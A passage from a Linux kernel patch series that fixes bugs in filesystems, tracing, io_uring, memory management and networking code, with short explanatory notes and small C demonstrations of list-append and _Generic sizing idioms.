++		if (retval)
+ 			goto end_rename;
+-		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 8011600999586..2528e8216c334 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5967,8 +5967,11 @@ static int ext4_load_journal(struct super_block *sb,
+ 	if (!really_read_only && journal_devnum &&
+ 	    journal_devnum != le32_to_cpu(es->s_journal_dev)) {
+ 		es->s_journal_dev = cpu_to_le32(journal_devnum);
+-
+-		/* Make sure we flush the recovery flag to disk. */
++		ext4_commit_super(sb);
++	}
++	if (!really_read_only && journal_inum &&
++	    journal_inum != le32_to_cpu(es->s_journal_inum)) {
++		es->s_journal_inum = cpu_to_le32(journal_inum);
+ 		ext4_commit_super(sb);
+ 	}
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index e0eb6eb02a834..b17c1b90e1224 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -386,6 +386,17 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 	struct inode *inode;
+ 	int err;
+ 
++	/*
++	 * We have to check for this corruption early as otherwise
++	 * iget_locked() could wait indefinitely for the state of our
++	 * parent inode.
++	 */
++	if (parent->i_ino == ea_ino) {
++		ext4_error(parent->i_sb,
++			   "Parent and EA inode have the same ino %lu", ea_ino);
++		return -EFSCORRUPTED;
++	}
++
+ 	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+diff --git a/fs/jffs2/file.c b/fs/jffs2/file.c
+index ba86acbe12d3f..0479096b96e4c 100644
+--- a/fs/jffs2/file.c
++++ b/fs/jffs2/file.c
+@@ -137,19 +137,18 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 	struct jffs2_inode_info *f = JFFS2_INODE_INFO(inode);
+ 	struct jffs2_sb_info *c = JFFS2_SB_INFO(inode->i_sb);
+ 	pgoff_t index = pos >> PAGE_SHIFT;
+-	uint32_t pageofs = index << PAGE_SHIFT;
+ 	int ret = 0;
+ 
+ 	jffs2_dbg(1, "%s()\n", __func__);
+ 
+-	if (pageofs > inode->i_size) {
+-		/* Make new hole frag from old EOF to new page */
++	if (pos > inode->i_size) {
++		/* Make new hole frag from old EOF to new position */
+ 		struct jffs2_raw_inode ri;
+ 		struct jffs2_full_dnode *fn;
+ 		uint32_t alloc_len;
+ 
+-		jffs2_dbg(1, "Writing new hole frag 0x%x-0x%x between current EOF and new page\n",
+-			  (unsigned int)inode->i_size, pageofs);
++		jffs2_dbg(1, "Writing new hole frag 0x%x-0x%x between current EOF and new position\n",
++			  (unsigned int)inode->i_size, (uint32_t)pos);
+ 
+ 		ret = jffs2_reserve_space(c, sizeof(ri), &alloc_len,
+ 					  ALLOC_NORMAL, JFFS2_SUMMARY_INODE_SIZE);
+@@ -169,10 +168,10 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 		ri.mode = cpu_to_jemode(inode->i_mode);
+ 		ri.uid = cpu_to_je16(i_uid_read(inode));
+ 		ri.gid = cpu_to_je16(i_gid_read(inode));
+-		ri.isize = cpu_to_je32(max((uint32_t)inode->i_size, pageofs));
++		ri.isize = cpu_to_je32((uint32_t)pos);
+ 		ri.atime = ri.ctime = ri.mtime = cpu_to_je32(JFFS2_NOW());
+ 		ri.offset = cpu_to_je32(inode->i_size);
+-		ri.dsize = cpu_to_je32(pageofs - inode->i_size);
++		ri.dsize = cpu_to_je32((uint32_t)pos - inode->i_size);
+ 		ri.csize = cpu_to_je32(0);
+ 		ri.compr = JFFS2_COMPR_ZERO;
+ 		ri.node_crc = cpu_to_je32(crc32(0, &ri, sizeof(ri)-8));
+@@ -202,7 +201,7 @@ static int jffs2_write_begin(struct file *filp, struct address_space *mapping,
+ 			goto out_err;
+ 		}
+ 		jffs2_complete_reservation(c);
+-		inode->i_size = pageofs;
++		inode->i_size = pos;
+ 		mutex_unlock(&f->sem);
+ 	}
+ 
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 1d65f6ef00ca8..0394505fdce3f 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -1977,11 +1977,26 @@ int ocfs2_write_end_nolock(struct address_space *mapping,
+ 	}
+ 
+ 	if (unlikely(copied < len) && wc->w_target_page) {
++		loff_t new_isize;
++
+ 		if (!PageUptodate(wc->w_target_page))
+ 			copied = 0;
+ 
+-		ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
+-				       start+len);
++		new_isize = max_t(loff_t, i_size_read(inode), pos + copied);
++		if (new_isize > page_offset(wc->w_target_page))
++			ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
++					       start+len);
++		else {
++			/*
++			 * When page is fully beyond new isize (data copy
++			 * failed), do not bother zeroing the page. Invalidate
++			 * it instead so that writeback does not get confused
++			 * and put the page & buffer dirty bits into an
++			 * inconsistent state.
++			 */
++			block_invalidate_folio(page_folio(wc->w_target_page),
++						0, PAGE_SIZE);
++		}
+ 	}
+ 	if (wc->w_target_page)
+ 		flush_dcache_page(wc->w_target_page);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b65b0dfb4fb4..288c6feda5de2 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -447,11 +447,11 @@ struct drm_bridge_funcs {
+ 	 *
+ 	 * The returned array must be allocated with kmalloc() and will be
+ 	 * freed by the caller. If the allocation fails, NULL should be
+-	 * returned. num_output_fmts must be set to the returned array size.
++	 * returned. num_input_fmts must be set to the returned array size.
+ 	 * Formats listed in the returned array should be listed in decreasing
+ 	 * preference order (the core will try all formats until it finds one
+ 	 * that works). When the format is not supported NULL should be
+-	 * returned and num_output_fmts should be set to 0.
++	 * returned and num_input_fmts should be set to 0.
+ 	 *
+ 	 * This method is called on all elements of the bridge chain as part of
+ 	 * the bus format negotiation process that happens in
+diff --git a/include/drm/drm_gem.h b/include/drm/drm_gem.h
+index bd42f25e449c2..60b2dda8d964b 100644
+--- a/include/drm/drm_gem.h
++++ b/include/drm/drm_gem.h
+@@ -472,7 +472,9 @@ int drm_gem_dumb_map_offset(struct drm_file *file, struct drm_device *dev,
+ void drm_gem_lru_init(struct drm_gem_lru *lru, struct mutex *lock);
+ void drm_gem_lru_remove(struct drm_gem_object *obj);
+ void drm_gem_lru_move_tail(struct drm_gem_lru *lru, struct drm_gem_object *obj);
+-unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru,
++			       unsigned int nr_to_scan,
++			       unsigned long *remaining,
+ 			       bool (*shrink)(struct drm_gem_object *obj));
+ 
+ #endif /* __DRM_GEM_H__ */
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index d6119c5d1069b..a9764cbf7f8d2 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -228,6 +228,12 @@ static inline unsigned short req_get_ioprio(struct request *req)
+ 	*(listptr) = rq;				\
+ } while (0)
+ 
++#define rq_list_add_tail(lastpptr, rq)	do {		\
++	(rq)->rq_next = NULL;				\
++	**(lastpptr) = rq;				\
++	*(lastpptr) = &rq->rq_next;			\
++} while (0)
++
+ #define rq_list_pop(listptr)				\
+ ({							\
+ 	struct request *__req = NULL;			\
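
The new rq_list_add_tail() appends in O(1) by carrying a cursor that points at the last next-pointer in the list: the request is written through the cursor, then the cursor advances to the new request's rq_next field, so the empty list needs no special case. A standalone sketch of that pointer-to-pointer idiom:

/* Pointer-to-pointer tail cursor behind rq_list_add_tail(): `tail`
 * always points at the link that should receive the next node. */
#include <stdio.h>
#include <stdlib.h>

struct node {
	int val;
	struct node *next;
};

static void list_add_tail(struct node ***tailp, struct node *n)
{
	n->next = NULL;
	**tailp = n;		/* hook n into the list */
	*tailp = &n->next;	/* cursor now points at n's link */
}

int main(void)
{
	struct node *head = NULL;
	struct node **tail = &head;

	for (int i = 1; i <= 3; i++) {
		struct node *n = malloc(sizeof(*n));

		n->val = i;
		list_add_tail(&tail, n);
	}
	for (struct node *n = head; n; n = n->next)
		printf("%d ", n->val);	/* prints: 1 2 3 */
	putchar('\n');
	return 0;
}
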
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index 486c4e3b6d6a6..c7f0f14e1f74b 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -212,6 +212,7 @@ struct fb_deferred_io {
+ 	/* delay between mkwrite and deferred handler */
+ 	unsigned long delay;
+ 	bool sort_pagereflist; /* sort pagelist by offset */
++	int open_count; /* number of opened files; protected by fb_info lock */
+ 	struct mutex lock; /* mutex that protects the pageref list */
+ 	struct list_head pagereflist; /* list of pagerefs for touched pages */
+ 	/* callback */
+diff --git a/include/linux/interconnect-provider.h b/include/linux/interconnect-provider.h
+index cd5c5a27557f5..d12cd18aab3f4 100644
+--- a/include/linux/interconnect-provider.h
++++ b/include/linux/interconnect-provider.h
+@@ -122,6 +122,9 @@ int icc_link_destroy(struct icc_node *src, struct icc_node *dst);
+ void icc_node_add(struct icc_node *node, struct icc_provider *provider);
+ void icc_node_del(struct icc_node *node);
+ int icc_nodes_remove(struct icc_provider *provider);
++void icc_provider_init(struct icc_provider *provider);
++int icc_provider_register(struct icc_provider *provider);
++void icc_provider_deregister(struct icc_provider *provider);
+ int icc_provider_add(struct icc_provider *provider);
+ void icc_provider_del(struct icc_provider *provider);
+ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec);
+@@ -167,6 +170,15 @@ static inline int icc_nodes_remove(struct icc_provider *provider)
+ 	return -ENOTSUPP;
+ }
+ 
++static inline void icc_provider_init(struct icc_provider *provider) { }
++
++static inline int icc_provider_register(struct icc_provider *provider)
++{
++	return -ENOTSUPP;
++}
++
++static inline void icc_provider_deregister(struct icc_provider *provider) { }
++
+ static inline int icc_provider_add(struct icc_provider *provider)
+ {
+ 	return -ENOTSUPP;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index ba2bd604359d4..b072449b0f1ac 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -294,9 +294,11 @@ struct hh_cache {
+  * relationship HH alignment <= LL alignment.
+  */
+ #define LL_RESERVED_SPACE(dev) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom)&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ #define LL_RESERVED_SPACE_EXTRA(dev,extra) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom+(extra))&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom) + (extra)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ 
+ struct header_ops {
+ 	int	(*create) (struct sk_buff *skb, struct net_device *dev,
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index cb538bc579710..d20695184e0b9 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1417,6 +1417,7 @@ void pci_bus_add_resource(struct pci_bus *bus, struct resource *res,
+ 			  unsigned int flags);
+ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n);
+ void pci_bus_remove_resources(struct pci_bus *bus);
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res);
+ int devm_request_pci_bus_resources(struct device *dev,
+ 				   struct list_head *resources);
+ 
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index c255273b02810..37ad81058d6ae 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -97,7 +97,10 @@ struct intc_hw_desc {
+ 	unsigned int nr_subgroups;
+ };
+ 
+-#define _INTC_ARRAY(a) a, __same_type(a, NULL) ? 0 : sizeof(a)/sizeof(*a)
++#define _INTC_SIZEOF_OR_ZERO(a) (_Generic(a,                 \
++                                 typeof(NULL):  0,           \
++                                 default:       sizeof(a)))
++#define _INTC_ARRAY(a) a, _INTC_SIZEOF_OR_ZERO(a)/sizeof(*a)
+ 
+ #define INTC_HW_DESC(vectors, groups, mask_regs,	\
+ 		     prio_regs,	sense_regs, ack_regs)	\
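
The rewritten _INTC_ARRAY computes the element count through _Generic: a NULL argument selects the typeof(NULL) association and yields 0, while a real array falls through to default and yields its sizeof, avoiding the old ternary whose untaken sizeof(a)/sizeof(*a) arm was still compiled and could trigger pointer-division warnings for NULL. A small demo of the same selection, assuming NULL is ((void *)0) as in the kernel and glibc, and typeof support (GCC/Clang, or C23):

/* How the new _INTC_SIZEOF_OR_ZERO selects by type: NULL (void *)
 * matches the typeof(NULL) branch and yields 0; an array decays to
 * a different pointer type, so default picks sizeof(a). */
#include <stddef.h>
#include <stdio.h>

#define SIZEOF_OR_ZERO(a) (_Generic((a),		\
			   typeof(NULL): 0,		\
			   default:      sizeof(a)))

int main(void)
{
	int vectors[8];

	printf("array: %zu bytes\n", (size_t)SIZEOF_OR_ZERO(vectors));
	printf("NULL:  %zu bytes\n", (size_t)SIZEOF_OR_ZERO(NULL));
	return 0;
}
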
+diff --git a/include/linux/tracepoint.h b/include/linux/tracepoint.h
+index 4b33b95eb8be7..b01421902cfce 100644
+--- a/include/linux/tracepoint.h
++++ b/include/linux/tracepoint.h
+@@ -231,12 +231,11 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+  * not add unwanted padding between the beginning of the section and the
+  * structure. Force alignment to the same alignment as the section start.
+  *
+- * When lockdep is enabled, we make sure to always do the RCU portions of
+- * the tracepoint code, regardless of whether tracing is on. However,
+- * don't check if the condition is false, due to interaction with idle
+- * instrumentation. This lets us find RCU issues triggered with tracepoints
+- * even when this tracepoint is off. This code has no purpose other than
+- * poking RCU a bit.
++ * When lockdep is enabled, we make sure to always test if RCU is
++ * "watching" regardless of whether the tracepoint is enabled. Tracepoints
++ * require RCU to be active, and it should always warn at the tracepoint
++ * site if it is not watching, as it will need to be active when the
++ * tracepoint is enabled.
+  */
+ #define __DECLARE_TRACE(name, proto, args, cond, data_proto)		\
+ 	extern int __traceiter_##name(data_proto);			\
+@@ -249,9 +248,7 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+ 				TP_ARGS(args),				\
+ 				TP_CONDITION(cond), 0);			\
+ 		if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
+-			rcu_read_lock_sched_notrace();			\
+-			rcu_dereference_sched(__tracepoint_##name.funcs);\
+-			rcu_read_unlock_sched_notrace();		\
++			WARN_ON_ONCE(!rcu_is_watching());		\
+ 		}							\
+ 	}								\
+ 	__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args),		\
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index c36656d8ac6c7..006858ed04e8c 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -145,6 +145,7 @@ struct scsi_device {
+ 	const char * model;		/* ... after scan; point to static string */
+ 	const char * rev;		/* ... "nullnullnullnull" before scan */
+ 
++#define SCSI_DEFAULT_VPD_LEN	255	/* default SCSI VPD page size (max) */
+ 	struct scsi_vpd __rcu *vpd_pg0;
+ 	struct scsi_vpd __rcu *vpd_pg83;
+ 	struct scsi_vpd __rcu *vpd_pg80;
+@@ -214,6 +215,7 @@ struct scsi_device {
+ 					 * creation time */
+ 	unsigned ignore_media_change:1; /* Ignore MEDIA CHANGE on resume */
+ 	unsigned silence_suspend:1;	/* Do not print runtime PM related messages */
++	unsigned no_vpd_size:1;		/* No VPD size reported in header */
+ 
+ 	unsigned int queue_stopped;	/* request queue is quiesced */
+ 	bool offline_already;		/* Device offline message logged */
+diff --git a/include/scsi/scsi_devinfo.h b/include/scsi/scsi_devinfo.h
+index 5d14adae21c78..6b548dc2c4965 100644
+--- a/include/scsi/scsi_devinfo.h
++++ b/include/scsi/scsi_devinfo.h
+@@ -32,7 +32,8 @@
+ #define BLIST_IGN_MEDIA_CHANGE	((__force blist_flags_t)(1ULL << 11))
+ /* do not do automatic start on add */
+ #define BLIST_NOSTARTONADD	((__force blist_flags_t)(1ULL << 12))
+-#define __BLIST_UNUSED_13	((__force blist_flags_t)(1ULL << 13))
++/* do not ask for VPD page size first on some broken targets */
++#define BLIST_NO_VPD_SIZE	((__force blist_flags_t)(1ULL << 13))
+ #define __BLIST_UNUSED_14	((__force blist_flags_t)(1ULL << 14))
+ #define __BLIST_UNUSED_15	((__force blist_flags_t)(1ULL << 15))
+ #define __BLIST_UNUSED_16	((__force blist_flags_t)(1ULL << 16))
+@@ -74,8 +75,7 @@
+ #define __BLIST_HIGH_UNUSED (~(__BLIST_LAST_USED | \
+ 			       (__force blist_flags_t) \
+ 			       ((__force __u64)__BLIST_LAST_USED - 1ULL)))
+-#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_13 | \
+-			     __BLIST_UNUSED_14 | \
++#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_14 | \
+ 			     __BLIST_UNUSED_15 | \
+ 			     __BLIST_UNUSED_16 | \
+ 			     __BLIST_UNUSED_24 | \
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 7d5b544cfc305..3526389ac2180 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -84,6 +84,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *src_file;
+ 	int ret;
+ 
++	if (msg->len)
++		return -EINVAL;
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+@@ -120,7 +122,7 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	 * completes with -EOVERFLOW, then the sender must ensure that a
+ 	 * later IORING_OP_MSG_RING delivers the message.
+ 	 */
+-	if (!io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0, true))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+ 	io_double_unlock_ctx(ctx, target_ctx, issue_flags);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 3b9e86108f435..227ada7240295 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2170,7 +2170,7 @@ static void perf_group_detach(struct perf_event *event)
+ 		/* Inherit group flags from the previous leader */
+ 		sibling->group_caps = event->group_caps;
+ 
+-		if (!RB_EMPTY_NODE(&event->group_node)) {
++		if (sibling->attach_state & PERF_ATTACH_CONTEXT) {
+ 			add_event_to_groups(sibling, event->ctx);
+ 
+ 			if (sibling->state == PERF_EVENT_STATE_ACTIVE)
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 6f726ea0fde01..59062fedeaf7c 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1537,7 +1537,8 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ 	key.flags = end;	/* overload flags, as it is unsigned long */
+ 
+ 	for (pg = ftrace_pages_start; pg; pg = pg->next) {
+-		if (end < pg->records[0].ip ||
++		if (pg->index == 0 ||
++		    end < pg->records[0].ip ||
+ 		    start >= (pg->records[pg->index - 1].ip + MCOUNT_INSN_SIZE))
+ 			continue;
+ 		rec = bsearch(&key, pg->records, pg->index,
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f70765780ed3f..888980257340f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5120,6 +5120,8 @@ loff_t tracing_lseek(struct file *file, loff_t offset, int whence)
+ static const struct file_operations tracing_fops = {
+ 	.open		= tracing_open,
+ 	.read		= seq_read,
++	.read_iter	= seq_read_iter,
++	.splice_read	= generic_file_splice_read,
+ 	.write		= tracing_write_stub,
+ 	.llseek		= tracing_lseek,
+ 	.release	= tracing_release,
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index da3bfe8625d96..e3df03cdecbcb 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1330,6 +1330,9 @@ static const char *hist_field_name(struct hist_field *field,
+ {
+ 	const char *field_name = "";
+ 
++	if (WARN_ON_ONCE(!field))
++		return field_name;
++
+ 	if (level > 1)
+ 		return field_name;
+ 
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index d440ddd5fd8b2..c4945f8adc119 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -492,6 +492,10 @@ static int start_cpu_kthread(unsigned int cpu)
+ {
+ 	struct task_struct *kthread;
+ 
++	/* Do not start a new hwlatd thread if it is already running */
++	if (per_cpu(hwlat_per_cpu_data, cpu).kthread)
++		return 0;
++
+ 	kthread = kthread_run_on_cpu(kthread_fn, NULL, cpu, "hwlatd/%u");
+ 	if (IS_ERR(kthread)) {
+ 		pr_err(BANNER "could not start sampling thread\n");
+@@ -584,9 +588,6 @@ static int start_per_cpu_kthreads(struct trace_array *tr)
+ 	 */
+ 	cpumask_and(current_mask, cpu_online_mask, tr->tracing_cpumask);
+ 
+-	for_each_online_cpu(cpu)
+-		per_cpu(hwlat_per_cpu_data, cpu).kthread = NULL;
+-
+ 	for_each_cpu(cpu, current_mask) {
+ 		retval = start_cpu_kthread(cpu);
+ 		if (retval)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 0729973d486a6..b8d654963df87 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2004,7 +2004,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	pgtable_t pgtable;
+-	pmd_t _pmd;
++	pmd_t _pmd, old_pmd;
+ 	int i;
+ 
+ 	/*
+@@ -2015,7 +2015,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 	 *
+ 	 * See Documentation/mm/mmu_notifier.rst
+ 	 */
+-	pmdp_huge_clear_flush(vma, haddr, pmd);
++	old_pmd = pmdp_huge_clear_flush(vma, haddr, pmd);
+ 
+ 	pgtable = pgtable_trans_huge_withdraw(mm, pmd);
+ 	pmd_populate(mm, &_pmd, pgtable);
+@@ -2024,6 +2024,8 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 		pte_t *pte, entry;
+ 		entry = pfn_pte(my_zero_pfn(haddr), vma->vm_page_prot);
+ 		entry = pte_mkspecial(entry);
++		if (pmd_uffd_wp(old_pmd))
++			entry = pte_mkuffd_wp(entry);
+ 		pte = pte_offset_map(&_pmd, haddr);
+ 		VM_BUG_ON(!pte_none(*pte));
+ 		set_pte_at(mm, haddr, pte, entry);
+diff --git a/mm/mincore.c b/mm/mincore.c
+index fa200c14185fc..1eb6aac88d845 100644
+--- a/mm/mincore.c
++++ b/mm/mincore.c
+@@ -33,7 +33,7 @@ static int mincore_hugetlb(pte_t *pte, unsigned long hmask, unsigned long addr,
+ 	 * Hugepages under user process are always in RAM and never
+ 	 * swapped out, but theoretically it needs to be checked.
+ 	 */
+-	present = pte && !huge_pte_none(huge_ptep_get(pte));
++	present = pte && !huge_pte_none_mostly(huge_ptep_get(pte));
+ 	for (; addr != end; vec++, addr += PAGE_SIZE)
+ 		*vec = present;
+ 	walk->private = vec;
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 554a4b11f4fec..af59c3f2ec2e7 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1284,7 +1284,7 @@ int p9_client_create_dotl(struct p9_fid *ofid, const char *name, u32 flags,
+ 		 qid->type, qid->path, qid->version, iounit);
+ 
+ 	memmove(&ofid->qid, qid, sizeof(struct p9_qid));
+-	ofid->mode = mode;
++	ofid->mode = flags;
+ 	ofid->iounit = iounit;
+ 
+ free_and_error:
+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index a9fde48cffd43..5fe075bf479ec 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -1852,6 +1852,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 	int new_master_mtu;
+ 	int old_master_mtu;
+ 	int mtu_limit;
++	int overhead;
+ 	int cpu_mtu;
+ 	int err;
+ 
+@@ -1880,9 +1881,10 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 			largest_mtu = slave_mtu;
+ 	}
+ 
+-	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu);
++	overhead = dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu + overhead);
+ 	old_master_mtu = master->mtu;
+-	new_master_mtu = largest_mtu + dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	new_master_mtu = largest_mtu + overhead;
+ 	if (new_master_mtu > mtu_limit)
+ 		return -ERANGE;
+ 
+@@ -1917,8 +1919,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 
+ out_port_failed:
+ 	if (new_master_mtu != old_master_mtu)
+-		dsa_port_mtu_change(cpu_dp, old_master_mtu -
+-				    dsa_tag_protocol_overhead(cpu_dp->tag_ops));
++		dsa_port_mtu_change(cpu_dp, old_master_mtu - overhead);
+ out_cpu_failed:
+ 	if (new_master_mtu != old_master_mtu)
+ 		dev_set_mtu(master, old_master_mtu);
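
The MTU fix folds the tagging overhead into one place: the limit becomes
min(master max, slave max + overhead), and the master MTU is the largest slave
MTU plus that same overhead. A small sketch of the arithmetic with made-up
numbers (the names are illustrative, not the DSA API):

#include <stdio.h>

static int min_int(int a, int b) { return a < b ? a : b; }

int main(void)
{
	int master_max_mtu = 1518;
	int slave_max_mtu  = 1500;
	int overhead       = 8;    /* e.g. an 8-byte DSA tag */
	int largest_mtu    = 1500; /* largest MTU requested on any port */

	/* Fixed logic: the slave cap is compared after adding the tag
	 * overhead, so a 1500-byte user MTU is accepted when the master
	 * can carry the 1508-byte tagged frame. */
	int mtu_limit      = min_int(master_max_mtu, slave_max_mtu + overhead);
	int new_master_mtu = largest_mtu + overhead;

	printf("limit=%d new_master=%d -> %s\n", mtu_limit, new_master_mtu,
	       new_master_mtu > mtu_limit ? "ERANGE" : "ok");
	return 0;
}
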
+diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c
+index b5736ef16ed2d..390f4be7f7bec 100644
+--- a/net/ipv4/fib_frontend.c
++++ b/net/ipv4/fib_frontend.c
+@@ -576,6 +576,9 @@ static int rtentry_to_fib_config(struct net *net, int cmd, struct rtentry *rt,
+ 			cfg->fc_scope = RT_SCOPE_UNIVERSE;
+ 	}
+ 
++	if (!cfg->fc_table)
++		cfg->fc_table = RT_TABLE_MAIN;
++
+ 	if (cmd == SIOCDELRT)
+ 		return 0;
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index cd8b2f7a8f341..f0750c06d5ffc 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -828,8 +828,14 @@ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	struct in6_addr addr_any = {};
+ 
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return net_eq(ib2_net(tb), net) && tb->port == port &&
++				tb->l3mdev == l3mdev &&
++				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return net_eq(ib2_net(tb), net) && tb->port == port &&
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 019f3b0839c52..24961b304dad0 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -614,10 +614,10 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > dev->needed_headroom)
+-		dev->needed_headroom = headroom;
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
+@@ -800,10 +800,10 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		dev->stats.tx_dropped++;
+ 		kfree_skb(skb);
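
needed_headroom is written by the transmit path while other contexts may read
it concurrently, so the patch wraps the accesses in READ_ONCE()/WRITE_ONCE()
to rule out load/store tearing. In portable C11 the closest analogue is a
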